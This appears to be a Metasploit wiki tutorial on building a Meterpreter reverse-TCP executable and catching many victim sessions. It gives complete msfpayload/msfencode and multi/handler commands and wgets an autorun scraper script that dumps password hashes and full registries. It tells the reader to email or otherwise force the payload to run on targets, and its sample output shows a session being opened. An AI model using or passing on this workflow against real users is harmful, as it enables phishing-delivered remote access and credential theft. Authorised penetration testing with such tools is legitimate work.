Metasploit

Meterpreter

Create a Meterpreter Executable to Connect Back to Your Machine

Step 1. To generate an executable for the test, we use msfpayload piped to msfencode.

$ msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
  msfencode -b '' -t exe -o meterpreter.exe

$ file meterpreter.exe
meterpreter.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

$ ls -alrt meterpreter.exe
-rw-r--r-- 1 hdm hdm 9728 Nov 17 13:24 meterpreter.exe

Step 2. Configure a shellcode handler inside Metasploit 3. Since we are targeting a wide variety of users, we want them to connect back to us. In order to get the most amount of information possible, we will be using the Meterpreter payload.

msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST A.B.C.D
msf exploit(handler) > set LPORT 8080

Step 3. In order to make efficient use of each session, we are going to provide Meterpreter with an "autorun" script. This script will scrape system information from each session automatically when the session is created. One example of this kind of script can be found at:

http://metasploit.com/users/hdm/tools/scraper.rb

msf exploit(handler) > sh -c 'cd /tmp; wget http://metasploit.com/users/hdm/tools/scraper.rb'
msf exploit(handler) > set AutoRunScript /tmp/scraper.rb
msf exploit(handler) > exploit -j

Step 4. Send out our email or otherwise force the Meterpreter payload to execute on each target. At this point, results should start streaming in. Once the autorun script completes, the session will be available from the msfconsole. The captured data will be stored in the ~/.msf3/logs/scraper/ directory.

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] New session on 10.10.11.164:12188...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\HD\LOCALS~1\Temp\NIgfrwlC.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\HD\LOCALS~1\Temp\dClzheFr.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\HD\LOCALS~1\Temp\mhJZFMly.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\HD\LOCALS~1\Temp\CphWxqAm.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\HD\LOCALS~1\Temp\aHrkdFru.reg)
[*]  Cleaning HKU
[*] Completed processing on 10.10.11.164:12188...

[*] Meterpreter session 1 opened (10.10.10.26:8080 -> 10.10.11.164:12188)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: HDM-WIN\HD
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.